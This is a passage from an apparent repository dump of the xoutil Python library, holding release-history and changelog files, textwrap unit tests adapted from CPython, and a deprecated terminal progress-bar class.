2.0.3\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.3.rst\n\n\n2018-03-30. Release 2.0.2\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.2.rst\n\n\n2018-03-22. Release 2.0.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.1.rst\n\n\n2018-03-02. Release 2.0.0\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-2.0.0.rst\n\n\n1.9 series\n----------\n\n.. note:: End-of-life for xoutil 1.9\n\n xoutil 1.9.7 will be the last release of xoutil that adds functionality.\n Future releases will be strictly bug-fix only.\n\n.. _rel-1.9.9:\n\n2018-11-07. Release 1.9.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.9.rst\n\n.. _rel-1.9.8:\n\n2018-09-24. Release 1.9.8\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.8.rst\n\n.. _rel-1.9.7:\n\n2018-09-14. Release 1.9.7\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.7.rst\n\n\n.. _rel-1.9.6:\n\n2018-07-30. Release 1.9.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.6.rst\n\n.. _rel-1.9.5:\n\n2018-06-25. Release 1.9.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.5.rst\n\n\n.. _rel-1.9.4:\n\n2018-05-08. Release 1.9.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.4.rst\n\n\n.. _rel-1.9.3:\n\n2018-04-16. Release 1.9.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.3.rst\n\n.. _rel-1.9.2:\n\n2018-03-30. Release 1.9.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.2.rst\n\n.. _rel-1.9.1:\n\n2018-03-22. Release 1.9.1\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.1.rst\n\n\n2018-03-02. Release 1.9.0\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.9.0.rst\n\n\n1.8 series\n----------\n\n2018-02-24. Release 1.8.8\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.8.rst\n\n\n2018-01-06. Release 1.8.7\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.7.rst\n\n\n2018-01-02. Release 1.8.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.6.rst\n\n\n2017-12-22. Release 1.8.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.5.rst\n\n\n2017-12-15. Release 1.8.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.4.rst\n\n\n2017-11-28. Release 1.8.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.3.rst\n\n\n2017-11-22. Release 1.8.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.2.rst\n\n\n2017-11-17. Release 1.8.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.1.rst\n\n\n2017-11-03. Release 1.8.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.8.0.rst\n\n\n1.7 series\n----------\n\n2017-10-31. Release 1.7.12\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.12.rst\n\n\n2017-10-05. 1.7.11\n~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.11.rst\n\n\n2017-09-21. 1.7.10\n~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.10.rst\n\n\n2017-09-20. 1.7.9\n~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.9.rst\n\n\n2017-09-19. 1.7.8\n~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.8.rst\n\n\n2017-09-07. 1.7.7\n~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.7.rst\n\n\n2017-09-05. Release 1.7.6\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.6.rst\n\n\n2017-09-05. Release 1.7.5\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.5.rst\n\n\n2017-04-06. Release 1.7.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.4.rst\n\n\n2017-02-23. Release 1.7.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.3.rst\n\n\n2017-02-07. Release 1.7.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.2.rst\n\n\n2015-12-17. Release 1.7.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.1.rst\n\n.. warning:: Due to lack of time, we have decided to release this version\n without proper releases of 1.7.0 and 1.6.11.\n\n\n.. _release-1.7.0:\n\nUnreleased. Release 1.7.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.7.0.rst\n\n\n1.6 series\n----------\n\n\nUnreleased. Release 1.6.11\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.11.rst\n\n\n2015-04-15. Release 1.6.10\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.10.rst\n\n\n2015-04-03. Release 1.6.9\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.9.rst\n\n\n2015-01-26. Release 1.6.8\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.8.rst\n\n\n2014-12-17. Release 1.6.7\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.7.rst\n\n\n2014-11-26. Release 1.6.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.6.rst\n\n\n2014-10-13. Release 1.6.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.5.rst\n\n\n2014-09-13. Release 1.6.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.4.rst\n\n2014-08-05. Release 1.6.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.3.rst\n\n\n2014-08-04. Release 1.6.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.2.rst\n\n\n2014-07-18. Release 1.6.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.1.rst\n\n\n2014-06-02. Release 1.6.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.6.0.rst\n\n\n1.5 series\n----------\n\n2014-05-29. Release 1.5.6\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.6.rst\n\n\n2014-05-13. Release 1.5.5\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.5.rst\n\n2014-04-08. Release 1.5.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.4.rst\n\n\n2014-04-01. Release 1.5.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.3.rst\n\n2014-03-03. Release 1.5.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.2.rst\n\n\n2014-02-14. Release 1.5.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.1.rst\n\n\n2014-01-24. Release 1.5.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/_changes-1.5.0.rst\n\n\n1.4 series\n----------\n\n.. include:: history/changes-1.4.2.rst\n.. include:: history/changes-1.4.1.rst\n\n2013-04-26. Release 1.4.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.4.0.rst\n\n\n1.3 series\n----------\n\n.. include:: history/changes-1.3.0.rst\n\n1.2 series\n----------\n\n2013-04-03. Release 1.2.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.3.rst\n\n\n2013-03-25. Release 1.2.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.2.rst\n\n\n2013-02-14. Release 1.2.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.1.rst\n\n\n2013-01-04. Release 1.2.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. include:: history/changes-1.2.0.rst\n\n\n1.1 series\n----------\n\n2012-11-01. Release 1.1.4\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces `xoutil.compat.iteritems_`:func:, `xoutil.compat.iterkeys_`:func:\n and `xoutil.compat.itervalues_`:func:.\n\n- `execution context <xoutil.context>`:mod: are now aware of `zope.interface`\n interfaces; so that you may ask for a context name implementing a given\n interface, instead of the name itself.\n\n- Improves xoutil.formatter documentation.\n\n- Several fixes to `xoutil.aop.classical`:mod:. It has sudden backwards\n incompatible changes.\n\n- `before` and `after` methods may use the `*args, **kwargs` idiom to get the\n passed arguments of the weaved method.\n\n- Several minor fixes: Invalid warning about Unset not in xoutil.types\n\n2012-08-22. Release 1.1.3\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Adds function `xoutil.fs.rmdirs`:func: that removes empty dirs.\n\n- Adds functions `xoutil.string.safe_join`:func:,\n `xoutil.string.safe_encode`:func:, `xoutil.string.safe_decode`:func:,\n and `xoutil.string.safe_strip`:func:; and the class\n `xoutil.string.SafeFormatter`:class:.\n\n- Adds function `xoutil.cpystack.iter_frames`:func:.\n\n2012-07-11. Release 1.1.2\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Fixes all copyrights notices and chooses the PSF License for Python 3.2.3\n as the license model for xoutil releases.\n\n- All releases from now on will be publicly available at github_.\n\n.. _github: https://github.com/merchise-autrement/xoutil/\n\n.. TODO: Migrate some stuffs from \"/merchise-autrement/\" by \"/merchise/\"\n\n2012-07-06. Release 1.1.1\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Improves deprecation warnings by pointing to the real calling filename\n- Removes all internal use of simple_memoize since it's deprecated. We now use\n `~xoutil.functools.lru_cache`:func:.\n\n2012-07-03. Release 1.1.0\n~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Created the whole documentation Sphinx directory.\n\n- Removed xoutil.future since it was not properly tested.\n\n- Removed xoutil.annotate, since it's not portable across Python's VMs.\n\n- Introduced module `xoutil.collections`:mod:\n\n- Deprecated modules `xoutil.default_dict`:mod:, `xoutil.opendict`:mod: in\n favor of `xoutil.collections`:mod:.\n\n- Backported `xoutil.functools.lru_cache`:func: from Python 3.2.\n\n- Deprecated module `xoutil.memoize`:mod: in favor of\n `xoutil.functools.lru_cache`:func:.\n\n\n1.0 series\n----------\n\n2012-06-15. Release 1.0.30\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces a new module :py`xoutil.proxy`:mod:.\n\n- Starts working on the sphinx documentation so that we move to 1.1 release we\n a decent documentation.\n\n2012-06-01. Release 1.0.29.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces `xoutil.iterators.slides` and `xoutil.aop.basic.contextualized`\n\n2012-05-28. Release 1.0.28.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Fixes normalize path and other details\n- Makes validate_attrs to work with mappings as well as objects\n- Improves complementors to use classes as a special case of sources\n- Simplifies importing of legacy modules\n- PEP8\n\n2012-05-22. Release 1.0.27.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Removes bugs that were not checked (tested) in the previous release.\n\n2012-05-21. Release 1.0.26.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Changes in AOP classic. Now you have to rename after, before and around methods\n to _after, _before and _around.\n\n It is expected that the signature of those methods change in the future.\n\n- Introducing a default argument for `xoutil.objects.get_first_of`:func:.\n\n- Other minor additions in the code. Refactoring and the like.\n\n2012-04-30. Release 1.0.25.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Extends the classical AOP approach to modules. Implements an extended version\n with hooks.\n\n- 1.0.25.1: Makes classical/extended AOP more reliable to TypeError's in getattr.\n xoonko, may raise TypeError's for TranslatableFields.\n\n2012-04-27. Release 1.0.24.\n\n- Introduces a classical AOP implementation: xoutil.aop.classical.\n\n2012-04-10. Release 1.0.23.\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Introduces decorators: xoutil.decorators.instantiate and xoutil.aop.complementor\n\n2012-04-05. Release 1.0.22\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Allows annotation's expressions to use defined local variables. Before this\n release the following code raised an error::\n\n >>> from xoutil.annotate import annotate\n >>> x1 = 1\n >>> @annotation('(a: x1)')\n ... def dummy():\n ... pass\n Traceback (most recent call last):\n ...\n NameError: global name 'x1' is not defined\n\n- Fixes decorators to allow args-less decorators\n\n\n2012-04-03. Release 1.0.21\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n- Includes a new module `xoutil.annotate`:mod: that provides a way to place\n Python annotations in forward-compatible way.\n" }, { "alpha_fraction": 0.5800764560699463, "alphanum_fraction": 0.5819871425628662, "avg_line_length": 35.09404373168945, "blob_id": "59fd4de2991a49a4dc291ebb0ed0aedc3d527285", "content_id": "842faf4eaa0678553b5e6823f875d9fa3c640b30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11514, "license_type": "no_license", "max_line_length": 85, "num_lines": 319, "path": "/tests/test_textwrap.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "# -*- encoding: utf-8 -*-\n\n# Most of the code was taken from the Python 3.3 code base.\n#\n# Copyright (c) 2001-2012 Python Software Foundation. All rights reserved.\n#\n\nimport unittest\nfrom xoutil.future.textwrap import wrap, fill, dedent, indent\n\n\nclass BaseTestCase(unittest.TestCase):\n \"\"\"Parent class with utility methods for textwrap tests.\"\"\"\n\n def show(self, textin):\n if isinstance(textin, list):\n result = []\n for i in range(len(textin)):\n result.append(\" %d: %r\" % (i, textin[i]))\n result = \"\\n\".join(result)\n elif isinstance(textin, str):\n result = \" %s\\n\" % repr(textin)\n return result\n\n def check(self, result, expect):\n msg = \"expected:\\n%s\\nbut got:\\n%s\" % (self.show(expect), self.show(result))\n self.assertEqual(result, expect, msg)\n\n def check_wrap(self, text, width, expect, **kwargs):\n result = wrap(text, width, **kwargs)\n self.check(result, expect)\n\n def check_split(self, text, expect):\n result = self.wrapper._split(text)\n self.assertEqual(\n result, expect, \"\\nexpected %r\\n\" \"but got %r\" % (expect, result)\n )\n\n\nclass IndentTestCases(BaseTestCase):\n\n # called before each test method\n def setUp(self):\n self.text = \"\"\"\\\nThis paragraph will be filled, first without any indentation,\nand then with some (including a hanging indent).\"\"\"\n\n def test_fill(self):\n # Test the fill() method\n\n expect = \"\"\"\\\nThis paragraph will be filled, first\nwithout any indentation, and then with\nsome (including a hanging indent).\"\"\"\n\n result = fill(self.text, 40)\n self.check(result, expect)\n\n def test_initial_indent(self):\n # Test initial_indent parameter\n\n expect = [\n \" This paragraph will be filled,\",\n \"first without any indentation, and then\",\n \"with some (including a hanging indent).\",\n ]\n result = wrap(self.text, 40, initial_indent=\" \")\n self.check(result, expect)\n\n expect = \"\\n\".join(expect)\n result = fill(self.text, 40, initial_indent=\" \")\n self.check(result, expect)\n\n def test_subsequent_indent(self):\n # Test subsequent_indent parameter\n expect = \"\"\"\\\n * This paragraph will be filled, first\n without any indentation, and then\n with some (including a hanging\n indent).\"\"\"\n\n result = fill(self.text, 40, initial_indent=\" * \", subsequent_indent=\" \")\n self.check(result, expect)\n\n\n# Despite the similar names, DedentTestCase is *not* the inverse\n# of IndentTestCase!\nclass DedentTestCase(unittest.TestCase):\n def assertUnchanged(self, text):\n \"\"\"assert that dedent() has no effect on 'text'\"\"\"\n self.assertEqual(text, dedent(text))\n\n def test_dedent_nomargin(self):\n # No lines indented.\n text = \"Hello there.\\nHow are you?\\nOh good, I'm glad.\"\n self.assertUnchanged(text)\n\n # Similar, with a blank line.\n text = \"Hello there.\\n\\nBoo!\"\n self.assertUnchanged(text)\n\n # Some lines indented, but overall margin is still zero.\n text = \"Hello there.\\n This is indented.\"\n self.assertUnchanged(text)\n\n # Again, add a blank line.\n text = \"Hello there.\\n\\n Boo!\\n\"\n self.assertUnchanged(text)\n\n def test_dedent_even(self):\n # All lines indented by two spaces.\n text = \" Hello there.\\n How are ya?\\n Oh good.\"\n expect = \"Hello there.\\nHow are ya?\\nOh good.\"\n self.assertEqual(expect, dedent(text))\n\n # Same, with blank lines.\n text = \" Hello there.\\n\\n How are ya?\\n Oh good.\\n\"\n expect = \"Hello there.\\n\\nHow are ya?\\nOh good.\\n\"\n self.assertEqual(expect, dedent(text))\n\n # Now indent one of the blank lines.\n text = \" Hello there.\\n \\n How are ya?\\n Oh good.\\n\"\n expect = \"Hello there.\\n\\nHow are ya?\\nOh good.\\n\"\n self.assertEqual(expect, dedent(text))\n\n def test_dedent_uneven(self):\n # Lines indented unevenly.\n text = \"\"\"\\\n def foo():\n while 1:\n return foo\n \"\"\"\n expect = \"\"\"\\\ndef foo():\n while 1:\n return foo\n\"\"\"\n self.assertEqual(expect, dedent(text))\n\n # Uneven indentation with a blank line.\n text = \" Foo\\n Bar\\n\\n Baz\\n\"\n expect = \"Foo\\n Bar\\n\\n Baz\\n\"\n self.assertEqual(expect, dedent(text))\n\n # Uneven indentation with a whitespace-only line.\n text = \" Foo\\n Bar\\n \\n Baz\\n\"\n expect = \"Foo\\n Bar\\n\\n Baz\\n\"\n self.assertEqual(expect, dedent(text))\n\n # dedent() should not mangle internal tabs\n def test_dedent_preserve_internal_tabs(self):\n text = \" hello\\tthere\\n how are\\tyou?\"\n expect = \"hello\\tthere\\nhow are\\tyou?\"\n self.assertEqual(expect, dedent(text))\n\n # make sure that it preserves tabs when it's not making any\n # changes at all\n self.assertEqual(expect, dedent(expect))\n\n # dedent() should not mangle tabs in the margin (i.e.\n # tabs and spaces both count as margin, but are *not*\n # considered equivalent)\n def test_dedent_preserve_margin_tabs(self):\n text = \" hello there\\n\\thow are you?\"\n self.assertUnchanged(text)\n\n # same effect even if we have 8 spaces\n text = \" hello there\\n\\thow are you?\"\n self.assertUnchanged(text)\n\n # dedent() only removes whitespace that can be uniformly removed!\n text = \"\\thello there\\n\\thow are you?\"\n expect = \"hello there\\nhow are you?\"\n self.assertEqual(expect, dedent(text))\n\n text = \" \\thello there\\n \\thow are you?\"\n self.assertEqual(expect, dedent(text))\n\n text = \" \\t hello there\\n \\t how are you?\"\n self.assertEqual(expect, dedent(text))\n\n text = \" \\thello there\\n \\t how are you?\"\n expect = \"hello there\\n how are you?\"\n self.assertEqual(expect, dedent(text))\n\n\n# Test textwrap.indent\nclass IndentTestCase(unittest.TestCase):\n # The examples used for tests. If any of these change, the expected\n # results in the various test cases must also be updated.\n # The roundtrip cases are separate, because textwrap.dedent doesn't\n # handle Windows line endings\n ROUNDTRIP_CASES = (\n # Basic test case\n \"Hi.\\nThis is a test.\\nTesting.\",\n # Include a blank line\n \"Hi.\\nThis is a test.\\n\\nTesting.\",\n # Include leading and trailing blank lines\n \"\\nHi.\\nThis is a test.\\nTesting.\\n\",\n )\n CASES = ROUNDTRIP_CASES + (\n # Use Windows line endings\n \"Hi.\\r\\nThis is a test.\\r\\nTesting.\\r\\n\",\n # Pathological case\n \"\\nHi.\\r\\nThis is a test.\\n\\r\\nTesting.\\r\\n\\n\",\n )\n\n def test_indent_nomargin_default(self):\n # indent should do nothing if 'prefix' is empty.\n for text in self.CASES:\n self.assertEqual(indent(text, \"\"), text)\n\n def test_indent_nomargin_explicit_default(self):\n # The same as test_indent_nomargin, but explicitly requesting\n # the default behaviour by passing None as the predicate\n for text in self.CASES:\n self.assertEqual(indent(text, \"\", None), text)\n\n def test_indent_nomargin_all_lines(self):\n # The same as test_indent_nomargin, but using the optional\n # predicate argument\n predicate = lambda line: True\n for text in self.CASES:\n self.assertEqual(indent(text, \"\", predicate), text)\n\n def test_indent_no_lines(self):\n # Explicitly skip indenting any lines\n predicate = lambda line: False\n for text in self.CASES:\n self.assertEqual(indent(text, \" \", predicate), text)\n\n def test_roundtrip_spaces(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n self.assertEqual(dedent(indent(text, \" \")), text)\n\n def test_roundtrip_tabs(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n self.assertEqual(dedent(indent(text, \"\\t\\t\")), text)\n\n def test_roundtrip_mixed(self):\n # A whitespace prefix should roundtrip with dedent\n for text in self.ROUNDTRIP_CASES:\n self.assertEqual(dedent(indent(text, \" \\t \\t \")), text)\n\n def test_indent_default(self):\n # Test default indenting of lines that are not whitespace only\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n\\n Testing.\",\n # Include leading and trailing blank lines\n \"\\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \"\\n Hi.\\r\\n This is a test.\\n\\r\\n Testing.\\r\\n\\n\",\n )\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix), expect)\n\n def test_indent_explicit_default(self):\n # Test default indenting of lines that are not whitespace only\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n\\n Testing.\",\n # Include leading and trailing blank lines\n \"\\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \"\\n Hi.\\r\\n This is a test.\\n\\r\\n Testing.\\r\\n\\n\",\n )\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, None), expect)\n\n def test_indent_all_lines(self):\n # Add 'prefix' to all lines, including whitespace-only ones.\n prefix = \" \"\n expected = (\n # Basic test case\n \" Hi.\\n This is a test.\\n Testing.\",\n # Include a blank line\n \" Hi.\\n This is a test.\\n \\n Testing.\",\n # Include leading and trailing blank lines\n \" \\n Hi.\\n This is a test.\\n Testing.\\n\",\n # Use Windows line endings\n \" Hi.\\r\\n This is a test.\\r\\n Testing.\\r\\n\",\n # Pathological case\n \" \\n Hi.\\r\\n This is a test.\\n \\r\\n Testing.\\r\\n \\n\",\n )\n predicate = lambda line: True\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, predicate), expect)\n\n def test_indent_empty_lines(self):\n # Add 'prefix' solely to whitespace-only lines.\n prefix = \" \"\n expected = (\n # Basic test case\n \"Hi.\\nThis is a test.\\nTesting.\",\n # Include a blank line\n \"Hi.\\nThis is a test.\\n \\nTesting.\",\n # Include leading and trailing blank lines\n \" \\nHi.\\nThis is a test.\\nTesting.\\n\",\n # Use Windows line endings\n \"Hi.\\r\\nThis is a test.\\r\\nTesting.\\r\\n\",\n # Pathological case\n \" \\nHi.\\r\\nThis is a test.\\n \\r\\nTesting.\\r\\n \\n\",\n )\n predicate = lambda line: not line.strip()\n for text, expect in zip(self.CASES, expected):\n self.assertEqual(indent(text, prefix, predicate), expect)\n" }, { "alpha_fraction": 0.6038415431976318, "alphanum_fraction": 0.6134454011917114, "avg_line_length": 25.03125, "blob_id": "459595cee84cc0efba06907ecfc912b9cc1d5f05", "content_id": "169349396cde38e64d4b985d400802b5f5cb0169", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 833, "license_type": "permissive", "max_line_length": 77, "num_lines": 32, "path": "/docs/source/history/_changes-2.0.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- This is the first release for which Python 2 no longer supported. It was a\n good time! Good bye, Python 2!\n\n- The following imports are no longer available. Look for them in\n `xoutil.future`:mod:\\ :\n\n .. hlist::\n :columns: 3\n\n - ``xoutil.collection``\n - ``xoutil.datetime``\n - ``xoutil.functools``\n - ``xoutil.inspect``\n - ``xoutil.iterators``\n - ``xoutil.json``\n - ``xoutil.pprint``\n - ``xoutil.subprocess``\n - ``xoutil.textwrap``\n - ``xoutil.threading``\n - ``xoutil.types``\n\n- Deprecate modules that only provided a unifying mechanism between Python 2\n and 3, or that backported features from Python 3 to Python 2:\n\n .. hlist::\n :columns: 3\n\n - ``xoutil.annotate``\n - ``xoutil.eight``\n - ``xoutil.eight.urllib``\n\n- Remove deprecated module ``xoutil.html``.\n" }, { "alpha_fraction": 0.6961130499839783, "alphanum_fraction": 0.7102473378181458, "avg_line_length": 30.44444465637207, "blob_id": "e8419a6db579c5f75c3267c930671785fcdde4c2", "content_id": "b0174ef30d5d35b2fb763c7cf85f671037101f59", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 283, "license_type": "permissive", "max_line_length": 76, "num_lines": 9, "path": "/docs/source/history/_changes-2.1.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `~xotl.tools.iter_final_subclasses`:func: and\n `~xotl.tools.get_final_subclasses`:func:.\n\n- Stop support for Python 3.4.\n\n- Fix bug `#6`__: Instances of `~xotl.tools.symbols.boolean`:class: were not\n pickable.\n\n __ https://gitlab.merchise.org/merchise/xoutil/issues/6\n" }, { "alpha_fraction": 0.5410534739494324, "alphanum_fraction": 0.5511231422424316, "avg_line_length": 30.108434677124023, "blob_id": "e8208dbe48fd6aa30a4c52560b6981080d2e652b", "content_id": "a7ff019ac7e42315130ad4c769be483bf6f96cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2583, "license_type": "no_license", "max_line_length": 87, "num_lines": 83, "path": "/xotl/tools/progress.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tool to show a progress percent in the terminal.\n\n.. deprecated:: 2.1.0\n\n\"\"\"\n\n\n__all__ = [\"Progress\"]\n\n\n_HELIX = \"|/-\\\\\"\n\n\nclass Progress:\n \"\"\"\n Print a progress percent to the console. Also the elapsed and the\n estimated times.\n\n To signal an increment in progress just call the instance and (optionally)\n pass a message like in::\n\n progress = Progress(10)\n for i in range(10):\n progress()\n \"\"\"\n\n def __init__(self, max_value=100, delta=1, first_message=None, display_width=None):\n from xotl.tools.future.datetime import datetime\n\n self.max_value = max_value\n self.delta = delta\n self.percent = self.value = 0\n self.start_time = datetime.now()\n self.first_message = first_message\n self.display_width = display_width\n\n def __call__(self, progress=None, message=\"...\"):\n if self.first_message is not None:\n print(self.first_message)\n self.first_message = None\n if progress is None:\n self.value += self.delta\n else:\n self.value = progress\n percent = 100 * self.value // self.max_value\n if self.percent != percent:\n import sys\n from xotl.tools.future.datetime import strfdelta\n\n self.percent = percent\n helix = _HELIX[percent % len(_HELIX)]\n elapsed = self.start_time.now() - self.start_time\n _cls = type(elapsed)\n total = _cls(seconds=elapsed.total_seconds() * 100 / self.percent)\n _fmt = '\\r{helix} {percent}% - \"{elapsed}\" of about \"{total}\"'\n progress_line = _fmt.format(\n helix=helix,\n percent=percent,\n elapsed=strfdelta(elapsed),\n total=strfdelta(total),\n )\n max_width = self.display_width or self._get_terminal_width()\n _fmt = \"{message: >%d}\" % (max_width - len(progress_line) - 1)\n progress_line += _fmt.format(message=message)\n print(progress_line, end=(\"\" if percent != 100 else \"\\n\\r\"))\n sys.stdout.flush()\n\n def _get_terminal_width(self, default=120):\n import os\n\n try:\n return int(os.environ.get(\"COLUMNS\", default))\n except ValueError:\n return default\n" }, { "alpha_fraction": 0.7379310131072998, "alphanum_fraction": 0.7379310131072998, "avg_line_length": 47.33333206176758, "blob_id": "e2db3d57d34e4879c8358251313b68be8b7ce88a", "content_id": "4809361cfb68f0b43052603e75bf782950118726", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 290, "license_type": "permissive", "max_line_length": 75, "num_lines": 6, "path": "/docs/source/history/_changes-1.9.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Make `~xoutil.future.datetime.TimeSpan`:class: intersection *inversible*.\n Before, doing ``date.today() & TimeSpan()`` raised a TypeError, but\n swapping the operands worked. Now, both ways work.\n\n- Add `xoutil.objects.delegator`:func: and\n `xoutil.objects.DelegatedAttribute`:class:.\n" }, { "alpha_fraction": 0.6305732727050781, 